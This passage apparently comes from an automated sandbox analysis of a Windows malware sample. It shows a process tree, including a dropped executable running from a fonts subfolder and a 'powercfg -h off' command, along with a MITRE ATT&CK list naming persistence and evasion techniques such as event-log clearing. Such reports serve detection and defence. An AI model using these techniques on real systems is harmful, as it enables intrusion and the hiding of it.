    C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 152
    3⤵
    - Program crash
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powercfg -h off
  2⤵
  - Power Settings
  - System Location Discovery: System Language Discovery
  PID:4560
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3620
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg -h off
    3⤵
    - Power Settings
    - System Location Discovery: System Language Discovery
    PID:4936
- \??\c:\windows\fonts\yfcmpley\lafuza.exe
  c:\windows\fonts\yfcmpley\lafuza.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of FindShellTrayWindow
  PID:5444
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4504

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3992

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4856

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:6068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5632
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5588 -ip 5588
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:5788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Persistence

T1070.009

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery